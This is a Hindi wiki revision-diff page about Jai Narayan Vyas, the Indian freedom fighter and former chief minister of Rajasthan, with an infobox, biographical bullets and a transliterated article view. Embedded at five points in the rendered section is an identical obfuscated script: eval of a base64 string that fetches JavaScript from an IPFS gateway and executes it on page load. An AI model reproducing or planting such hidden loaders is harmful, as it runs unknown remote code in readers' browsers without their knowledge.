Difference between revisions of "जयनारायण व्यास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "आवाज" to "आवाज़")
Line 1: Line 1:
*जयनारायण व्यास का जन्म [[18 फरवरी]], 1899 ई. में [[जोधपुर]] में हुआ था।  
+
{{सूचना बक्सा राजनीतिज्ञ
 +
|चित्र=Jainarayan-vyas.jpg
 +
|चित्र का नाम=जयनारायण व्यास की प्रतिमा
 +
|पूरा नाम=जयनारायण व्यास
 +
|अन्य नाम=
 +
|जन्म=[[18 फरवरी]], [[1899]]
 +
|जन्म भूमि= [[जोधपुर]]
 +
|मृत्यु=[[14 मार्च]], [[1963]]
 +
|मृत्यु स्थान=[[दिल्ली]]
 +
|मृत्यु कारण=
 +
|अविभावक=
 +
|पति/पत्नी=गौरजा देवी व्यास
 +
|संतान=एक पुत्र और तीन पुत्रियाँ
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=
 +
|पार्टी=[[भारतीय राष्ट्रीय कांग्रेस]]
 +
|पद=[[राजस्थान]] के तीसरे एवं पाँचवें [[मुख्यमंत्री]]
 +
|भाषा=
 +
|जेल यात्रा=
 +
|कार्य काल=[[26 अप्रैल]] [[1951]] से [[3 मार्च]] [[1952]] तक और [[1 नवम्बर]] [[1952]]  से  [[12 नवम्बर]] [[1954]] तक
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''जयनारायण व्यास''' ([[अंग्रेज़ी]]:''Jai Narayan Vyas'') [[भारत]] के प्रमुख स्वतंत्रता सेनानी, [[राजस्थान]] के पूर्व [[मुख्यमंत्री]] और [[भारतीय राष्ट्रीय कांग्रेस]] पार्टी के प्रसिद्ध राजनेता थे।
 +
==संक्षिप्त परिचय==
 +
*जयनारायण व्यास का जन्म [[18 फरवरी]], [[1899]] ई. में [[जोधपुर]] में हुआ था।  
 
*वे [[राजस्थान]] के प्रमुख स्वतन्त्रता सेनानियों में से एक थे।  
 
*वे [[राजस्थान]] के प्रमुख स्वतन्त्रता सेनानियों में से एक थे।  
 
*वे पहले व्यक्ति थे, जिन्होंने सबसे पहले सामन्तशाही के ख़िलाफ़ आवाज़ उठाई और जागीदारी प्रथा की समाप्ति के साथ रियासतों में उत्तरदायी शासन की स्थापना पर बल दिया।  
 
*वे पहले व्यक्ति थे, जिन्होंने सबसे पहले सामन्तशाही के ख़िलाफ़ आवाज़ उठाई और जागीदारी प्रथा की समाप्ति के साथ रियासतों में उत्तरदायी शासन की स्थापना पर बल दिया।  
 
*वे 1927 ई. में ‘तरुण राजस्थान’ पत्र के प्रधान सम्पादक बने और 1936 ई. उन्होंने [[बम्बई]] से ‘अखण्ड भारत’ नामक दैनिक समाचार-पत्र निकालना प्रारम्भ किया।  
 
*वे 1927 ई. में ‘तरुण राजस्थान’ पत्र के प्रधान सम्पादक बने और 1936 ई. उन्होंने [[बम्बई]] से ‘अखण्ड भारत’ नामक दैनिक समाचार-पत्र निकालना प्रारम्भ किया।  
*उन्होंने कई बार जेल की यात्राएँ कीं।  
+
*जयनारायण व्यास ने कई बार जेल की यात्राएँ कीं।  
 
*[[नमक सत्याग्रह]] में भाग लेने के कारण उन्हें गिरफ्तार कर लिया गया।  
 
*[[नमक सत्याग्रह]] में भाग लेने के कारण उन्हें गिरफ्तार कर लिया गया।  
*1948 ई. में वे जोधपुर प्रजामण्डल के प्रधानमंत्री बनाये गये।  
+
*[[1948]] ई. में वे जोधपुर प्रजामण्डल के प्रधानमंत्री बनाये गये।  
*1956 से 1957 तक आप प्रान्तीय कांग्रेस कमेटी के अध्यक्ष रहे।  
+
*[[1956]] से [[1957]] तक जयनारायण व्यास प्रान्तीय कांग्रेस कमेटी के अध्यक्ष रहे।  
*1951 से 1954 तक वे राजस्थान के मुख्यमंत्री रहे।  
+
*[[1951]] से [[1954]] तक वे [[राजस्थान के मुख्यमंत्री]] रहे।  
*[[14 मार्च]], 1963 ई. में उनका देहावसन हो गया।  
+
*[[14 मार्च]], [[1963]] ई. में उनका निधन हो गया।  
  
  
 
{{प्रचार}}
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
{{cite book | last =नागोरी | first = डॉ. एस.एल. | title =स्वतंत्रता सेनानी कोश (गाँधीयुगीन) | edition = 2011 | publisher = गीतांजलि प्रकाशन, जयपुर | location = भारतडिस्कवरी पुस्तकालय | language = [[हिन्दी]] | pages = पृष्ठ सं 154 | chapter = खण्ड 3 }}
 
{{cite book | last =नागोरी | first = डॉ. एस.एल. | title =स्वतंत्रता सेनानी कोश (गाँधीयुगीन) | edition = 2011 | publisher = गीतांजलि प्रकाशन, जयपुर | location = भारतडिस्कवरी पुस्तकालय | language = [[हिन्दी]] | pages = पृष्ठ सं 154 | chapter = खण्ड 3 }}
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://rajassembly.nic.in/cm-photo.htm राजस्थान के पूर्व मुख्यमंत्री]
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{राजस्थान के मुख्यमंत्री}}
 
{{स्वतन्त्रता सेनानी}}
 
{{स्वतन्त्रता सेनानी}}
 +
[[Category:मुख्यमंत्री]][[Category:राजनीतिज्ञ]]
 +
[[Category:राजस्थान के मुख्यमंत्री]]
 
[[Category:स्वतन्त्रता_सेनानी]]
 
[[Category:स्वतन्त्रता_सेनानी]]
 +
[[Category:इतिहास कोश]][[Category:राजनीति कोश]]
 
[[Category:चरित कोश]]
 
[[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 13:58, 15 February 2013

jayanarayan vyas
poora nam jayanarayan vyas
janm 18 pharavari, 1899
janm bhoomi jodhapur
mrityu 14 march, 1963
mrityu sthan dilli
pati/patni gauraja devi vyas
santan ek putr aur tin putriyaan
nagarikata bharatiy
parti bharatiy rashtriy kaangres
pad rajasthan ke tisare evan paanchavean mukhyamantri
kary kal 26 aprail 1951 se 3 march 1952 tak aur 1 navambar 1952 se 12 navambar 1954 tak

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jayanarayan vyas (aangrezi:Jai Narayan Vyas) bharat ke pramukh svatantrata senani, rajasthan ke poorv mukhyamantri aur bharatiy rashtriy kaangres parti ke prasiddh rajaneta the.

sankshipt parichay

  • jayanarayan vyas ka janm 18 pharavari, 1899 ee. mean jodhapur mean hua tha.
  • ve rajasthan ke pramukh svatantrata senaniyoan mean se ek the.
  • ve pahale vyakti the, jinhoanne sabase pahale samantashahi ke khilaf avaz uthaee aur jagidari pratha ki samapti ke sath riyasatoan mean uttaradayi shasan ki sthapana par bal diya.
  • ve 1927 ee. mean ‘tarun rajasthan’ patr ke pradhan sampadak bane aur 1936 ee. unhoanne bambee se ‘akhand bharat’ namak dainik samachar-patr nikalana prarambh kiya.
  • jayanarayan vyas ne kee bar jel ki yatraean kian.
  • namak satyagrah mean bhag lene ke karan unhean giraphtar kar liya gaya.
  • 1948 ee. mean ve jodhapur prajamandal ke pradhanamantri banaye gaye.
  • 1956 se 1957 tak jayanarayan vyas prantiy kaangres kameti ke adhyaksh rahe.
  • 1951 se 1954 tak ve rajasthan ke mukhyamantri rahe.
  • 14 march, 1963 ee. mean unaka nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 154.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>